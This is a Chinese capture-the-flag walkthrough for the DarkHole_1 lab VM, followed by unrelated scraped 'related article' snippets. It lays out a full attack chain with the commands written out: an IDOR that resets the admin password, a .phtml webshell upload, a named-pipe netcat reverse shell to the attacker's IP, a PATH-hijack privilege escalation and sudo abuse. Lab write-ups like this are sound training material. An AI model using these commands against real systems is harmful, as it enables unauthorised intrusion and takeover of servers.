DARKHOLE_1攻略

简介DARKHOLE_1攻略攻击环境:kali被攻击环境:ubuntukali IP:192.168.133.131ubuntu IP : 未知1.主机发现​ 因为攻击机与被攻击机在同一网段,所以需要通过nmap 进一步确定其ipnmap -sP 所处网段example:nmap -sP 192.168.133.0/24​ 分析可知 Ubuntu ip 为 192.168.133.1352.端口扫描​ 全面扫描,获取端口,判断被攻击者所开服务 nmap -A

DARKHOLE_1攻略

攻击环境:kali

被攻击环境:ubuntu

kali IP:192.168.133.131

ubuntu IP : 未知

1.主机发现

​ 因为攻击机与被攻击机在同一网段,所以需要通过nmap 进一步确定其ip

nmap -sP 所处网段
example:nmap -sP 192.168.133.0/24

​ 分析可知 Ubuntu ip 为 192.168.133.135

2.端口扫描

​ 全面扫描,获取端口,判断被攻击者所开服务

 nmap -A 被攻击者ipexample: nmap -A 192.168.133.135

由上可得,所开端口:80 / 22

3.目录扫描

遍历网站目录

dirb  网址 / dirsearch -u 网址
example: dirb http://192.168.133.135

4.纵向提权

获得四个可访问目录,最重要的为upload 目录,判断可能存在文件上传漏洞,但现阶段无法使用,浏览页面,左上角发现,登录窗口连接,点击进入

没有账号,尝试创建,考虑管理员用户名称可能为admin,尝试创建username 为 admin 的账号

发现已经被占用,创建一个普通账户 用户名:test密码:1234 (由于手滑之前新建了一个qqq用户)

发现页面可以修改用户名与密码,尝试抓包,观察修改过程,修改密码:12345

ps :之前自己误操作新建了一个qqq账户,现在新建一个test账户,加上之前测试的admin用户,猜测现在可能有三个用户,阅读request 请求发现,修改密码时没有用户名等字段限制,并且发现请求体中有id字段,并且id赋值为3,大胆猜想,admin 账户为管理员,id=1,修改请求体中password=…&id=…,从而修改admin用户密码

返回登录页面输入账户名称admin 密码 12345,登录成功

成功获取管理员账号密码,登录页面,发现上传页面,判断是否存在文件上传漏洞,上传一句话木马测试,被拦截,判断上传种类限制存在与后台,判断黑白名单(通常白名单的限制比黑名单的条件更为苛刻),随着php版本的不断迭代,php中间件所能执行的php文件的后缀种类也在不断增加,经过不断地尝试,以phtml为后缀的一句话木马可以突破限制,由此推断后台限制为黑名单限制。使用中国蚁剑连接一句话木马,连接成功。

5.反弹shell

右键,点击虚拟终端

在kali中开启nc

nc -lvvp 供攻击机连接的端口号
example: nc -lvvp 8888

在蚁剑虚拟终端中输入这条命令

mknod 设备名称  p && nc  kali 的ip   kali的端口  0<设备名称 | /bin/bash 1>设备名称
example: mknod backdoor p && nc 192.168.133.131 8888 0<backdoor | /bin/bash 1>backdoor 获取回显窗口

kali 中获得shell 窗口,但是返回的shell 没有显示你所在文件目录,现阶段是那个用户,所以需要使用python 来返回一个shell,大多数Linux 都安装了python3,所以使用python3 来生成一个shell

python3 -c 'import pty as pt;pt.spawn("/bin/bash")'

6.root提权

cat /etc/passwd
========================================================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
darkhole:x:1000:1000:john:/home/darkhole:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
john:x:1001:1001:,,,:/home/john:/bin/bash
发现john用户

切换到/home/john目录下,发现toto文件有执行权限,发现敏感文件user.txt 与 password

执行toto

发现toto文件的功能就是查询用户的uid gid 等参数,与命令id 功能相同,猜测toto文件可能使用的id命令,所以,如果我新建一个假的id命令,id文件中写入/bin/bash 字段,生成一个shell,从而达到提权的目的,因为现在所处的目录没有写的权限,所以在/tmp 目录下新建id文件

cd /tmp
touch id
echo "/bin/bash" > id
chmod 777 id
export PATH=/tmp:$PATH
cd /home/john
./toto

cat password 得到 疑似john的密码

sudo -l
#执行命令输入密码,回显可知,john可以以root的身份执行file.py
所以在file.py 文件中写入 import pty;pty.spawn("/bin/bash")
sudo 执行,即可提权
进入root 目录,即可通关

DARKHOLE_1攻略相关推荐

  1. VIM配置攻略(最强干货加强版)

    自己最近也在折腾这个VIM的配置,在网上也看了很多教程等,说真的看的一头雾水.主要是对于一个初学者来说对Vundle等根本没有什么了解,也不知道怎么用,并且由于本人的Linux系统是CentOs6.5 ...

  2. 基于DCMTK的DICOM相关程序编写攻略

    2008年09月10日 星期三 15:35 基于DCMTK的DICOM相关程序编写攻略 前言: 由于现在的医学影像设备的图像存储和传输正在逐渐向DICOM标准靠拢,在我们进行医学图像处理的过程中,经常 ...

  3. http状态404 vscode_VS Code 调试完全攻略(5):基于浏览器的 React 应用

    每日前端夜话第344篇 翻译:疯狂的技术宅 作者:Charles Szilagyi 来源:charlesagile 正文共:1750 字 预计阅读时间:7 分钟 这次我们来研究怎样把调试器连接到用 C ...

  4. Java - 框架之 SpringBoot 攻略day01

    Spring-Boot 攻略 day01 spring-boot 一. 基本配置加运行 1. 导入配置文件(pom.xml 文件中) <parent> <groupId>org ...

  5. AWS攻略——使用CodeBuild进行自动化构建和部署Lambda(Python)

    Aws Lambda是Amazon推出的"无服务架构"服务.我们只需要简单的上传代码,做些简单的配置,便可以使用.而且它是按运行时间收费,这对于低频访问的服务来说很划算.具体的介绍 ...

  6. AWS攻略——使用CodeBuild进行自动化构建和部署静态网页

    首先声明下,使用"CodeBuild"部署并不是"正统"的方案,因为AWS提供了"CodeDeploy".如果不希望引入太多基础设施,可以考 ...

  7. 小黑盒不显示服务器,steam上买的游戏小黑盒不显示 | 手游网游页游攻略大全

    发布时间:2018-04-18 贪吃蛇遇上打方块是一款最近非常热门的休闲小游戏,游戏将贪吃蛇和打方块合而为一吸引了很多玩家!但是好多小伙们都不知道该怎么玩,下面小编来教你一个快速入门的小技巧吧!~ 小 ...

  8. 一般熟练盲打需要多久_进口攻略!一般货物进口清关需要多久?如何有效提高清关效率?...

    ***请点击上方红色的"关注"我们,您的关注,是我们努力的动力!谢谢!*** 一.清关是什么意思? 在回答"清关一般要多久之前"我们一起来看下,就是清关是什么意 ...

  9. 64位游戏找call_《使命召唤16:战区》配置注册登录全攻略,三步让你极迅游戏!...

    如果说谁是2020年最火的游戏,那么<使命召唤16:战区>绝对是排名第一.自从<使命召唤16:战区>发布之后,同时在线人数就不断刷新纪录,一天300万,3天800万 ,到现在已 ...

最新文章

  1. JQuery笔记(二)jq常用方法animate()
  2. 超简单的Oracle 数据库安装教程
  3. Python学习之迭代器协议
  4. java单例模式几种实现方式
  5. react16中ref的使用
  6. linux 中如何查看块设备,在linux中,如何确定使用块设备的进程?
  7. geoTools学习笔记001---(简介)
  8. oracle级联赋权,Oracle 级联with admin option 和 with grant option
  9. mysql maratadb_Mysql/Mairadb主从复制
  10. 大航海北斗星导航系统V1.10
  11. 1. 吴恩达机器学习课程-作业1-线性回归
  12. 阶段1 语言基础+高级_1-3-Java语言高级_06-File类与IO流_04 IO字节流_11_字节输入流一次读取多个字节...
  13. 无线投影仪服务器设置方法,无线投影仪怎么连接,看过教程,原来操作这么简单!...
  14. java项目图片保存在服务器,idea2019配置,Javaweb项目实现上传图片保存到本地文件文件夹,Tomcat服务器...
  15. 一个比较土但凑合能用的画心方法
  16. 【奥斯卡理财星体系 第五章】丨手把手教你从零开始搭建资产配置
  17. 通信达股票数据格式读取程序
  18. nginx nobody
  19. 在阿里的一年,让我的技术思维有了翻天覆地的变化
  20. dl380g6服务器开机没信号,DL380 G6常见问题二

热门文章

  1. 南京高中计算机老师,30个全省第一!南京老师又出名了!
  2. 快来开建春晚红包信息群吧!
  3. 利用函数求出两个数的最大值
  4. 大数据存储技术期末复习(自用)
  5. ❤️React Hooks⭐
  6. 京东商品详情数据接口api
  7. 附录3-form标签常用属性
  8. linkerd1.6 local安装方式文档
  9. android 磁场传感器应用
  10. python画玫瑰花(含文字)